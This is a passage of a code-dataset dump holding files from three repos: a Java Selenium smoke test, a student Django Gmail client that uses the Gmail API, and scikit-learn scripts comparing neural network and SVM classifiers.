(driver.findElements(By.cssSelector(flowHeaderId)).size() != 0);\n\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\tif(exists) {\n\t\t\tList <WebElement> flowList = driver.findElements(By.cssSelector(flowHeaderId));\n\t\t\tfor (WebElement flow: flowList) {\n\t\t\t\tif(flow.findElement(By.cssSelector(flowNameId)).getText().contains(flowName)) {\n\t\t\t\t\tcurrentState = chkCurrentFlowState(flow); //findCurrentState of the switch\n\t\t\t\t\tflow.findElement(By.cssSelector(toggleSwitch)).click();\n\t\t\t\t\twaitForElementVisibility(confirmOkButton,100);\n\t\t\t\t\tconfirmOkButton.click();\n\t\t\t\t\tif(chkCurrentFlowState(flow,!currentState)) {\n\t\t\t\t\t\tstatus = true;\n\t\t\t\t\t}\n\t\t\t\t\tbreak;\n\t\t\t\t}\t\t\t\n\t\t\t}\n\t\t} else {\n\t\t\tcom.jcabi.log.Logger.error(\"togglevFlowState\",\"No vflows configured!\");\n\t\t}\n\t\treturn status;\n\t}\n\t\n\tpublic void gotoPADashboard() {\n\t\tdashboardIcon.click();\n\t}\n\n}\n"
},
{
"alpha_fraction": 0.71856290102005,
"alphanum_fraction": 0.71856290102005,
"avg_line_length": 19.875,
"blob_id": "084db193a8c9f55a8ea0ada7587b9d1d7122d397",
"content_id": "085b23f1aa084937541337306ef1d6f97e6e55ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 8,
"path": "/src/test/java/com/pluribus/vcf/pagefactory/AuthServerType.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.pagefactory;\n\npublic enum AuthServerType {\n\t\n\tLDAP{public String toString(){return \"ldap\";}},\n\tAD{public String toString(){return \"ad\";}},\n\n}\n"
},
{
"alpha_fraction": 0.6550765037536621,
"alphanum_fraction": 0.7176634073257446,
"avg_line_length": 56.52000045776367,
"blob_id": "c51f8f9d0464f90f41ec318bd3140ef93472dd0f",
"content_id": "71973c4ec4c3b15ba14f90a5e40ba4729f1badd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1438,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 25,
"path": "/src/test/java/com/pluribus/vcf/pagefactory/LicenseTypes.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.pagefactory;\n\npublic enum LicenseTypes {\n\t\n\tVCFC_DEMO_10M{public String toString(){return \"VCFC-DEMO-10M\";}},\n\tVCFC_DEMO_100M{public String toString(){return \"VCFC-DEMO-100M\";}},\n\tVCFC_DEMO_1B{public String toString(){return \"VCFC-DEMO-1B\";}},\n\tVCFC_DEMO_10B{public String toString(){return \"VCFC-DEMO-10B\";}},\n\tVCFIA_DEMO_100M{public String toString(){return \"VCFIA-DEMO-100M\";}},\n\tVCFC_LIC_10M{public String toString(){return \"VCFC-LIC-10M\";}},\n\tVCFC_LIC_100M{public String toString(){return \"VCFC-LIC-100M\";}},\n\tVCFC_LIC_10B{public String toString(){return \"VCFC-LIC-10B\";}},\n\tVCFIA_LIC_100M{public String toString(){return \"VCFIA-LIC-100M\";}},\n\tVCFIA_LIC_1B{public String toString(){return \"VCFIA-LIC-1B\";}},\n\tVCFC_RPRT{public String toString(){return \"VCFC-RPRT\";}},\n\tVCFC_ALRT{public String toString(){return \"VCFC-ALRT\";}},\n\tVCFC_NVM_20PAK{public String toString(){return \"VCFC-NVM-20PAK\";}},\n\tVCFC_SSC_1YR_100M{public String toString(){return \"VCFC-SSC-1YR-100M\";}},\n\tVCFC_SSC_1YR_1B{public String toString(){return \"VCFC-SSC-1YR-1B\";}},\n\tVCFC_SSC_1YR_10B{public String toString(){return \"VCFC-SSC-1YR-10B\";}},\n\tVCFC_SSC_3YR_1B{public String toString(){return \"VCFC-SSC-3YR-1B\";}},\n\tVCFC_SSC_3YR_10B{public String toString(){return \"VCFC-SSC-3YR-10B\";}},\n\tVCFC_SSC_3YR_10M{public String toString(){return \"VCFC-SSC-3YR-10M\";}},\n\tVCFC_SSC_3YR_100M{public String toString(){return \"VCFC-SSC-3YR-100M\";}},\n}\n"
},
{
"alpha_fraction": 0.6458333134651184,
"alphanum_fraction": 0.7291666865348816,
"avg_line_length": 18.200000762939453,
"blob_id": "fdb7faf30fa9b41db0d12b12481942a3111996f4",
"content_id": "0049348d04eb5a59af54bfc3c799dd8216242ccd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 96,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 5,
"path": "/run.sh",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\nfor browser in \"safari\"\ndo\nmvn clean test -DvcfIp=10.9.10.110 -Dbrowser=$browser\ndone\n"
}
] | 13 |
Intro-to-SE-Lab-Fall-20/Group-4
|
https://github.com/Intro-to-SE-Lab-Fall-20/Group-4
|
1effe735f9a64fa1a0e5ddd47325d550d68d2675
|
bb2c3d29e2eb8dae5472a2b2b15e0184c9abe572
|
5e3e698999c9fda36a72a8140ce855adfbf01680
|
refs/heads/master
| 2023-01-10T03:37:44.105498 | 2020-11-10T22:12:18 | 2020-11-10T22:12:18 | 290,564,350 | 0 | 2 | null | 2020-08-26T17:40:40 | 2020-11-10T22:12:21 | 2020-11-11T07:15:48 |
Python
|
[
{
"alpha_fraction": 0.8533333539962769,
"alphanum_fraction": 0.8533333539962769,
"avg_line_length": 14,
"blob_id": "42c68e4c928de393664790c9027ee1d8c0c91b53",
"content_id": "9b3617af0cdca29117a042dab195571ea34a4b7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 75,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 5,
"path": "/requirements.txt",
"repo_name": "Intro-to-SE-Lab-Fall-20/Group-4",
"src_encoding": "UTF-8",
"text": "django\ndjango-allauth\ngoogle-api-python-client\ngoogle-auth\npython-dateutil\n"
},
{
"alpha_fraction": 0.5510203838348389,
"alphanum_fraction": 0.5513038635253906,
"avg_line_length": 33.92079162597656,
"blob_id": "5b2fa0565ca69160ee59be3b8e3b2d1bb85d5388",
"content_id": "a64706aaaaf431279b099922aafa4273643eaee9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3528,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 101,
"path": "/polymail/polymail/views.py",
"repo_name": "Intro-to-SE-Lab-Fall-20/Group-4",
"src_encoding": "UTF-8",
"text": "from django.conf import settings\nimport django.contrib.auth as auth\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import redirect, render\n\nfrom .forms import EmailForm, SearchForm\nfrom . import models\n\ndef index(request):\n messages = None\n if request.user.is_authenticated:\n creds = models.UserProfile.get_google_credentials(request)\n service = models.create_service_if_necessary(creds)\n\n if service is None:\n raise ValueError('Could not create Gmail API')\n\n if request.method == 'GET':\n form = SearchForm()\n service = settings._GMAIL_SERVICE\n if (service is not None):\n messages = models.get_inbox(service, user_id='me')\n else:\n form = SearchForm(request.POST)\n if form.is_valid():\n search_query = form.cleaned_data['search_query']\n # TODO: search for relevant emails and display in index\n return redirect('/')\n return render(request, 'main/index.html', {\"form\":form, \"messages\": messages})\n\ndef compose(request, thread_id):\n if request.method == 'GET':\n if thread_id != '0':\n service = settings._GMAIL_SERVICE\n if (service is not None):\n message = models.get_specific_message(service, user_id='me', thread_id=thread_id)\n subject = message['Subject']\n sender = message['Sender']\n date = message['Date']\n to = message['To']\n body = (\"\\n\\n\\n--------Forwarded message--------\\nFrom: \" + sender \n + \"\\nDate: \" + date + \"\\nSubject: \" + subject + \"\\nTo: \" + to + \"\\n\\n\")\n body += message['PlainBody']\n initial_dict = {\n \"subject\":subject,\n \"body\":body\n }\n form = EmailForm(initial=initial_dict)\n else:\n initial_dict = {\n \"subject\":\"service failed\"\n }\n form = EmailForm(initial=initial_dict)\n else:\n initial_dict = {}\n form = EmailForm(initial=initial_dict)\n else:\n form = EmailForm(request.POST)\n\n if form.is_valid():\n to_email = form.cleaned_data['to_email']\n subject = form.cleaned_data['subject']\n cc = form.cleaned_data['cc']\n body = form.cleaned_data['body']\n attachment_path = form.cleaned_data['attachment']\n\n sender = 'me' # FIXME This needs to be the logged in user's email\n\n message = models.create_gmail_message(\n sender,\n to_email,\n cc,\n subject,\n body,\n attachment_path\n )\n\n service = settings._GMAIL_SERVICE\n if service is None:\n raise ValueError('service is None')\n\n sent = models.send_gmail_message(service, user_id='me', message=message)\n\n if not sent:\n raise Exception('Error occurred sending email')\n\n return redirect('/')\n\n return render(request, 'main/compose.html', {'form': form})\n\ndef emailview(request, thread_id):\n message = None\n service = settings._GMAIL_SERVICE\n if (service is not None):\n message = models.get_specific_message(service, user_id='me', thread_id=thread_id)\n\n return render(request, 'main/view-email.html', {\"message\": message})\n\ndef logout(request):\n auth.logout(request)\n return redirect('/')\n\n"
},
{
"alpha_fraction": 0.6683291792869568,
"alphanum_fraction": 0.6683291792869568,
"avg_line_length": 29.846153259277344,
"blob_id": "632fe304ef7e3d54c8e3531ef52e26610ccc25c1",
"content_id": "d918df1aaaff5c4d83d182fd174774af322f818f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 401,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 13,
"path": "/polymail/polymail/urls.py",
"repo_name": "Intro-to-SE-Lab-Fall-20/Group-4",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom django.urls import include, path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index),\n path('logout/', views.logout),\n path('compose/<str:thread_id>/', views.compose, name=\"compose\"),\n path('emailview/<str:thread_id>/', views.emailview, name=\"emailview\"),\n path('admin/', admin.site.urls),\n path('accounts/', include('allauth.urls'))\n]\n"
},
{
"alpha_fraction": 0.588900625705719,
"alphanum_fraction": 0.5922183394432068,
"avg_line_length": 28.471111297607422,
"blob_id": "14c9019194ac9b3bc361b2ab1f851c35bccecb45",
"content_id": "0ef348266383514b2408f9119cdeac5e5d203b8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6631,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 225,
"path": "/polymail/polymail/models.py",
"repo_name": "Intro-to-SE-Lab-Fall-20/Group-4",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\n\nfrom allauth.account.models import EmailAddress\nfrom allauth.socialaccount.models import SocialApp, SocialAccount\n\nfrom google.oauth2.credentials import Credentials\nfrom googleapiclient.discovery import build\n\nimport mimetypes\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email.mime.image import MIMEImage\nfrom email.mime.audio import MIMEAudio\n\nimport os\n\nimport base64\nimport dateutil.parser as parser\n\n\ndef _on_delete(user):\n pass\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User, related_name='profile', on_delete=_on_delete)\n\n def __unicode__(self):\n return ''\n\n class Meta:\n db_table = 'user_profile'\n app_label = 'main'\n\n def get_google_credentials(request):\n app = SocialApp.objects.get(provider='google')\n account = SocialAccount.objects.get(user=request.user)\n\n token = account.socialtoken_set.first().token\n refresh_token = account.socialtoken_set.first().token_secret\n\n client_key = app.client_id\n client_secret = app.secret\n\n scopes = settings.SOCIALACCOUNT_PROVIDERS['google']['SCOPE']\n\n creds = Credentials(\n token=token,\n refresh_token=refresh_token,\n client_id=client_key,\n client_secret=client_secret,\n scopes=scopes\n )\n\n return creds\n\n def account_verified(self):\n if self.user.is_authenticated:\n result = EmailAddress.objects.filter(email=self.user.email)\n\n if len(result):\n return result[0].verified\n\n return False\n\ndef create_service_if_necessary(creds):\n if settings._GMAIL_SERVICE is None:\n service = build('gmail', 'v1', credentials=creds)\n settings._GMAIL_SERVICE = service\n\n return settings._GMAIL_SERVICE\n\ndef create_gmail_message(sender, to, cc, subject, body, attachment_path):\n if attachment_path:\n message = _create_gmail_message_with_attachment(sender, to, cc, subject, body, attachment_path)\n else:\n message = MIMEText(body)\n message['to'] = to\n message['from'] = sender\n message['subject'] = subject\n\n raw = base64.urlsafe_b64encode(message.as_bytes())\n raw = raw.decode()\n\n return {'raw': raw}\n\ndef _create_gmail_message_with_attachment(sender, to, cc, subject, body, attachment_path):\n message = MIMEMultipart()\n message['to'] = to\n message['from'] = sender\n message['subject'] = subject\n message.attach(MIMEText(body))\n\n content_type, encoding = mimetypes.guess_type(attachment_path)\n\n if content_type is None or encoding is not None:\n content_type = 'application/octet-stream'\n\n main, sub = content_type.split('/', 1)\n\n with open(attachment_path, mode='rb') as f:\n contents = f.read()\n\n if main == 'text':\n attach = MIMEText(contents, _subtype=sub)\n elif main == 'image':\n attach = MIMEImage(contents, _subtype=sub)\n elif main == 'audio':\n attach = MIMEAudio(contents, _subtype=sub)\n else:\n attach = MIMEBase(main, sub)\n attach.set_payload(contents)\n\n filename = os.path.basename(attachment_path)\n\n attach.add_header('Content-Disposition', 'attachment', filename=filename)\n message.attach(attach)\n\n return message\n\ndef send_gmail_message(service, user_id, message):\n result = service.users().messages().send(userId=user_id, body=message).execute()\n\n return True\n\ndef get_inbox(service, user_id):\n results = service.users().threads().list(userId=user_id).execute()\n threads = results['threads']\n messages_list = []\n for thread in threads:\n temp_dict = {}\n msg_id = thread['id']\n temp_dict['id'] = str(msg_id)\n msg = service.users().messages().get(userId='me', id=msg_id).execute()\n payload = msg['payload']\n header = payload['headers']\n\n for one in header:\n if one['name'] == 'Subject':\n msg_subject = one['value']\n temp_dict['Subject'] = msg_subject\n else:\n pass\n\n for two in header:\n if two['name'] == 'Date':\n msg_date = two['value']\n date_parse = (parser.parse(msg_date))\n m_date = (date_parse.date())\n temp_dict['Date'] = str(m_date)\n else:\n pass\n\n for three in header:\n if three['name'] == 'From':\n msg_from = three['value']\n temp_dict['Sender'] = msg_from\n else:\n pass\n\n temp_dict['Snippet'] = msg['snippet']\n\n messages_list.append(temp_dict)\n\n return messages_list\n\ndef get_specific_message(service, user_id, thread_id):\n temp_dict = {}\n temp_dict['id'] = thread_id\n msg = service.users().messages().get(userId=user_id, id=thread_id, format=\"full\").execute()\n payload = msg['payload']\n header = payload['headers']\n for one in header:\n if one['name'] == 'Subject':\n msg_subject = one['value']\n temp_dict['Subject'] = msg_subject\n else:\n pass\n for two in header:\n if two['name'] == 'Date':\n msg_date = two['value']\n date_parse = (parser.parse(msg_date))\n m_date = (date_parse.date())\n temp_dict['Date'] = str(m_date)\n else:\n pass\n for three in header:\n if three['name'] == 'From':\n msg_from = three['value']\n temp_dict['Sender'] = msg_from\n else:\n pass\n for four in header:\n if four['name'] == 'To':\n msg_to = four['value']\n temp_dict['To'] = msg_to\n else:\n pass\n temp_dict['Snippet'] = msg['snippet']\n try:\n msg_parts = payload['parts']\n part_one = msg_parts[1]\n part_body = part_one['body']\n part_data = part_body['data']\n msg_body = base64.urlsafe_b64decode(part_data)\n msg_body = msg_body.decode('utf-8')\n temp_dict['Body'] = msg_body\n except: \n temp_dict['Body'] = msg['snippet']\n\n try:\n msg_parts = payload['parts']\n part_one = msg_parts[0]\n part_body = part_one['body']\n part_data = part_body['data']\n msg_body = base64.urlsafe_b64decode(part_data)\n msg_body = msg_body.decode('utf-8')\n temp_dict['PlainBody'] = msg_body\n except: \n temp_dict['PlainBody'] = msg['snippet']\n\n return temp_dict\n"
},
{
"alpha_fraction": 0.7164633870124817,
"alphanum_fraction": 0.7195122241973877,
"avg_line_length": 22.428571701049805,
"blob_id": "a48e1e514065747032e275bbb67cfb182bb87799",
"content_id": "d0dacd81765b2e9e84c9f9882c1ab33e7950a8ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 328,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 14,
"path": "/launch.sh",
"repo_name": "Intro-to-SE-Lab-Fall-20/Group-4",
"src_encoding": "UTF-8",
"text": "#! /bin/sh\n\nPYTHON_BINARY=${PYTHON:-python3}\n\n# Setup Python environment\nif [[ ! -d \"env\" ]]; then\n $PYTHON_BINARY -m venv env\nfi\n\nsource env/bin/activate\npip --disable-pip-version-check install -q -r requirements.txt\n\n# Launch the server; 'python' now points to $PYTHON_BINARY in the env\npython polymail/manage.py runserver\n"
},
{
"alpha_fraction": 0.8058914542198181,
"alphanum_fraction": 0.8074418902397156,
"avg_line_length": 106.5,
"blob_id": "99f66d8d3766863a73d61be3852de4a12a019043",
"content_id": "7b40f939f629370cc1550d9edb4ac6c2285f6d06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3225,
"license_type": "no_license",
"max_line_length": 712,
"num_lines": 30,
"path": "/README.md",
"repo_name": "Intro-to-SE-Lab-Fall-20/Group-4",
"src_encoding": "UTF-8",
"text": "# Group-4\nIntro to SE Lab Section 03 Group 4\n\n\n## Polymail\n### Description\nPolymail is a user-friendly web-based email client which seamlessly interfaces with multiple email service providers (gmail, yahoo, etc.). Polymail provides the user with the ability to quickly compose, edit, send, and forward emails to any email address. Emails can be formatted before sending by including italicized and bold text, as well as non-ASCII characters. Emails can also be supplemented with attachments of various media types including common document, audio, and video formats. Efficient searching through emails is also integrated through the use of user-provided keywords. Finally, Polymail is presented in an intuitive browser-based user interface to maximize user productivity and satisfaction.\n\n\n### Objective\nPolymail aims to be a reinvention of the popular email systems that are used by applications such as Gmail, Yahoo.com, and Outlook. Users at any experience level should be able to use Polymail, so our UI should be intuitive and easy to navigate around received and sent emails and different email functionalities, including composing, editing, sending, and forwarding emails as well as adding attachments. Polymail navigation will be aided by a search bar, which will assist users in quickly finding specific emails. \n\n\n### Features\n##### Email account authentication for Google users\nGoogle account holders will be able to sign in to Polymail securely by using the OAuth2 protocol. Persistent login during a user's session is required to prevent having to repeatedly login, and automatic sign out after a period of inactivity will also be available to avoid unauthorized users accessing Polymail on someone else's machine.\n\n##### Compose, edit, send, and forward email messages\nPolymail allows users to use basic email functionality including composing new messages, editing existing messages or drafts, and sending and forwarding emails to other email accounts including those outside of Polymail's supported email providers. Within these emails, Polymail will allow utilization of special characters beyond ASCII as well as bold and italicized text.\n\n##### Search for matching emails\nA search box will be available above the inbox where users can search for emails fitting the criteria that they fill into the field. The emails will be filtered by using a keyword search algorithm, and the resulting emails will be displayed in a list format for easy access and viewing.\n\n##### Email attachments\nWhile editing emails, an \"Add attachment\" option will be displayed in the window which will allow users to add an attachment from their local machine to the email. Various file types will be available for attachment including common text, image, audio, and video formats. This attachment will be bundled with the message and sent to the user alongside it. For emails with attachments, the send feature will wait for the attachments to finish uploading to send the email to avoid sending incomplete packages. This feature will be integrated with Windows and macOS file browsers for reliable image selection and attachment.\n\n### Contributors\nWil England - @wil-is-still-in-school\nIsaac Dyess - @isaacdyess\nDaniel Molsbarger - @Daniel-Molsbarger\n"
},
{
"alpha_fraction": 0.6938775777816772,
"alphanum_fraction": 0.7080062627792358,
"avg_line_length": 48.07692337036133,
"blob_id": "621484613ef7684278ec94e0f9b721b47eaf1c60",
"content_id": "b0a5ef04dc5ba1f451f7a99f6b43e3dd7de2ff70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 637,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 13,
"path": "/polymail/polymail/forms.py",
"repo_name": "Intro-to-SE-Lab-Fall-20/Group-4",
"src_encoding": "UTF-8",
"text": "from django import forms\nimport datetime\n\nclass EmailForm(forms.Form):\n to_email = forms.EmailField(label=\"To\", required=True)\n subject = forms.CharField(label=\"Subject\", max_length=998, required=True)\n cc = forms.CharField(label=\"cc\", max_length=90, required=False)\n body = forms.CharField(label=\"Body\", widget=forms.Textarea)\n # attachment = forms.Field(label=\"attachment\", widget=forms.FileInput, required=False)\n attachment = forms.CharField(label=\"attachment\", max_length=1000, required=False)\n\nclass SearchForm(forms.Form):\n search_query = forms.CharField(label=\"Enter Search Term\")"
}
] | 7 |
kirbykasischke192/supervisedLearning
|
https://github.com/kirbykasischke192/supervisedLearning
|
212d8fe2920606262a8984b5bdda5a3e4758c27d
|
ec4c8e61c7cad07789f89486740e3e23f3e65605
|
40e7b00e92e187e4583e80a05114f59aea79e28d
|
refs/heads/master
| 2020-04-22T02:26:54.931396 | 2019-02-11T01:48:55 | 2019-02-11T01:48:55 | 170,049,313 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6592456698417664,
"alphanum_fraction": 0.7008905410766602,
"avg_line_length": 37.16999816894531,
"blob_id": "a02f0cf4fa0f524e35de2196c60635b160e59165",
"content_id": "96ea555daaf06a022b54eeef237ba2ee70117b66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3818,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 100,
"path": "/src/neural_net.py",
"repo_name": "kirbykasischke192/supervisedLearning",
"src_encoding": "UTF-8",
"text": "#https://stackabuse.com/introduction-to-neural-networks-with-scikit-learn/\n\nimport pandas as pd\nfrom sklearn.neural_network import MLPClassifier\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn.metrics as metrics\nimport time as time\n\nsatdata = pd.read_csv(\"./../data/sat_data.csv\")\npendata = pd.read_csv(\"./../data/pen_data.csv\")\n\nXsat = satdata.iloc[:, :-1].values\nysat = satdata.iloc[:, 36].values\n\nXpen = pendata.iloc[:, :-1].values\nypen = pendata.iloc[:, 16].values\n\nfrom sklearn.model_selection import train_test_split \nX_train_sat, X_test_sat, y_train_sat, y_test_sat = train_test_split(Xsat, ysat, test_size=0.20)\nX_train_pen, X_test_pen, y_train_pen, y_test_pen = train_test_split(Xpen, ypen, test_size=0.20)\n\nfrom sklearn.preprocessing import StandardScaler \npen_scaler = StandardScaler()\nsat_scaler = StandardScaler()\npen_scaler.fit(X_train_pen)\nsat_scaler.fit(X_train_sat)\n\nX_train_pen = pen_scaler.transform(X_train_pen)\nX_train_sat = sat_scaler.transform(X_train_sat)\nX_test_pen = pen_scaler.transform(X_test_pen) \nX_test_sat = sat_scaler.transform(X_test_sat)\n\npen_train_error = []\npen_test_error = []\nsat_train_error = []\nsat_test_error = []\nsat_accuracy = []\npen_accuracy = []\n \nmax_depth_list = np.linspace(2, 50, 49, endpoint=True)\nlayer_size = [10,20,30,40,50,60,70,80,90,100]\nhidden_layers = [(10,10,10), (20,20,20), (30,30,30), (40,40,40), (50,50,50),\n (60,60,60), (70,70,70), (80,80,80),\n (90,90,90), (100,100,100)]\nfunctions = ['identity', 'logistic', 'tanh', 'relu']\nfor function in functions:\n sat_classifier = MLPClassifier(hidden_layer_sizes=(10,10,10), max_iter=1000, activation=function)\n pen_classifier = MLPClassifier(hidden_layer_sizes=(10,10,10), max_iter=1000, activation=function)\n #satT1 = time.time() \n sat_classifier.fit(X_train_sat, y_train_sat.ravel())\n #satT2 = time.time()\n #penT1 = time.time()\n pen_classifier.fit(X_train_pen, y_train_pen.ravel())\n #penT2 = time.time()\n y_pred_sat_test = sat_classifier.predict(X_test_sat)\n y_pred_pen_test = pen_classifier.predict(X_test_pen)\n\n pen_accuracy.append(metrics.accuracy_score(y_test_pen, y_pred_pen_test))\n sat_accuracy.append(metrics.accuracy_score(y_test_sat, y_pred_sat_test))\n\n# print(satT2-satT1)\n# print(penT2-penT1)\n\npen_test_error = [1 - accuracy for accuracy in pen_accuracy]\nsat_test_error = [1 - accuracy for accuracy in sat_accuracy]\n \nplt.figure(figsize=(12, 6)) \n#plt.plot(layer_size, pen_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\nfor i in range(4):\n plt.bar(functions[i], pen_test_error[i])\nplt.title('Error Rate vs Activation Function') \nplt.xlabel('Activation Function') \nplt.ylabel('Error')\nplt.show()\nplt.figure(figsize=(12, 6))\n#plt.plot(layer_size, sat_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\nfor i in range(4):\n plt.bar(functions[i], sat_test_error[i])\nplt.title('Error Rate vs Activation Function') \nplt.xlabel('Activation Function') \nplt.ylabel('Error')\nplt.show()\n\n# from sklearn.neural_network import MLPClassifier \n# sat_mlp = MLPClassifier(hidden_layer_sizes=(10, 10, 10), max_iter=1000) \n# sat_mlp.fit(X_train_sat, y_train_sat.ravel())\n# pen_mlp = MLPClassifier(hidden_layer_sizes=(10, 10, 10), max_iter=1000) \n# pen_mlp.fit(X_train_pen, y_train_pen.ravel())\n\n# y_pred_sat = sat_mlp.predict(X_test_sat)\n# y_pred_pen = pen_mlp.predict(X_test_pen)\n\n# from sklearn.metrics import classification_report, confusion_matrix, accuracy_score\n# print(confusion_matrix(y_test_sat, y_pred_sat))\n# print(confusion_matrix(y_test_pen, y_pred_pen))\n# print(classification_report(y_test_sat, y_pred_sat))\n# print(classification_report(y_test_pen, y_pred_pen))\n# print(accuracy_score(y_test_pen, y_pred_pen))\n# print(accuracy_score(y_test_sat, y_pred_sat))\n\n"
},
{
"alpha_fraction": 0.6954377293586731,
"alphanum_fraction": 0.7074599266052246,
"avg_line_length": 33.157894134521484,
"blob_id": "f63936559512f4c03b2a8a55b35f35353589bbf1",
"content_id": "e4267baafc047dccac133e10728e23bf3e8ce017",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3244,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 95,
"path": "/src/svm.py",
"repo_name": "kirbykasischke192/supervisedLearning",
"src_encoding": "UTF-8",
"text": "#https://stackabuse.com/implementing-svm-and-kernel-svm-with-pythons-scikit-learn/\n\nimport pandas as pd \nimport numpy as np \nimport matplotlib.pyplot as plt\nfrom sklearn.svm import SVC\nimport sklearn.metrics as metrics\nimport time as time\n\nsatdata = pd.read_csv(\"./../data/sat_data.csv\")\npendata = pd.read_csv(\"./../data/pen_data.csv\")\n\nXsat = satdata.iloc[:, :-1].values\nysat = satdata.iloc[:, 36].values\n\nXpen = pendata.iloc[:, :-1].values\nypen = pendata.iloc[:, 16].values\n\nfrom sklearn.model_selection import train_test_split \nX_train_sat, X_test_sat, y_train_sat, y_test_sat = train_test_split(Xsat, ysat, test_size=0.20)\nX_train_pen, X_test_pen, y_train_pen, y_test_pen = train_test_split(Xpen, ypen, test_size=0.20)\n\nfrom sklearn.preprocessing import StandardScaler \npen_scaler = StandardScaler()\nsat_scaler = StandardScaler()\npen_scaler.fit(X_train_pen)\nsat_scaler.fit(X_train_sat)\n\nX_train_pen = pen_scaler.transform(X_train_pen)\nX_train_sat = sat_scaler.transform(X_train_sat)\nX_test_pen = pen_scaler.transform(X_test_pen) \nX_test_sat = sat_scaler.transform(X_test_sat)\n\npen_train_error = []\npen_test_error = []\nsat_train_error = []\nsat_test_error = []\nsat_accuracy = []\npen_accuracy = []\n\nfunctions = ['linear', 'poly', 'rbf', 'sigmoid']\niterations = np.linspace(100, 1000, 10, endpoint=True)\n\nsat_classifier = SVC(kernel='rbf', gamma='auto') \npen_classifier = SVC(kernel='rbf', gamma='auto') \nsatT1 = time.time() \nsat_classifier.fit(X_train_sat, y_train_sat)\nsatT2 = time.time()\npenT1 = time.time()\npen_classifier.fit(X_train_pen, y_train_pen)\npenT2 = time.time()\n\nprint(satT2-satT1)\nprint(penT2-penT1)\n\ny_pred_sat_test = sat_classifier.predict(X_test_sat)\ny_pred_pen_test = pen_classifier.predict(X_test_pen)\n\npen_accuracy.append(metrics.accuracy_score(y_test_pen, y_pred_pen_test))\nsat_accuracy.append(metrics.accuracy_score(y_test_sat, y_pred_sat_test))\n\npen_test_error = [1 - accuracy for accuracy in pen_accuracy]\nsat_test_error = [1 - accuracy for accuracy in sat_accuracy]\n \n# plt.figure(figsize=(12, 6)) \n# plt.plot(iterations, pen_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\n# for i in range(4):\n# plt.bar(functions[i], pen_test_error[i])\n# plt.title('Error Rate vs Max Iterations') \n# plt.xlabel('Max Iterations') \n# plt.ylabel('Error')\n# plt.show()\n# plt.figure(figsize=(12, 6))\n# plt.plot(iterations, sat_test_error, label='Testing Error', color='red', linestyle='solid', marker='')\n# for i in range(4):\n# plt.bar(functions[i], sat_test_error[i])\n# plt.title('Error Rate vs Max Iterations') \n# plt.xlabel('Max Iterations') \n# plt.ylabel('Error')\n# plt.show()\n\n \n# sat_svclassifier = SVC(kernel='linear', gamma='auto') \n# sat_svclassifier.fit(X_train_sat, y_train_sat) \n# pen_svclassifier = SVC(kernel='linear', gamma='auto') \n# pen_svclassifier.fit(X_train_pen, y_train_pen)\n\n# y_pred_sat = sat_svclassifier.predict(X_test_sat)\n# y_pred_pen = pen_svclassifier.predict(X_test_pen)\n\n# from sklearn.metrics import classification_report, confusion_matrix\n# print(confusion_matrix(y_test_sat, y_pred_sat))\n# print(confusion_matrix(y_test_pen, y_pred_pen))\n# print(classification_report(y_test_sat, y_pred_sat))\n# print(classification_report(y_test_pen, y_pred_pen))"
},
{
"alpha_fraction": 0.704983651638031,
"alphanum_fraction": 0.7177155613899231,
"avg_line_length": 32.53658676147461,
"blob_id": "46a62b587611dafaeef3772e717c6e4bcf8016ef",
"content_id": "28def91444e2ee9a137d5c18c16e76716486d3b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2749,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 82,
"path": "/src/knn.py",
"repo_name": "kirbykasischke192/supervisedLearning",
"src_encoding": "UTF-8",
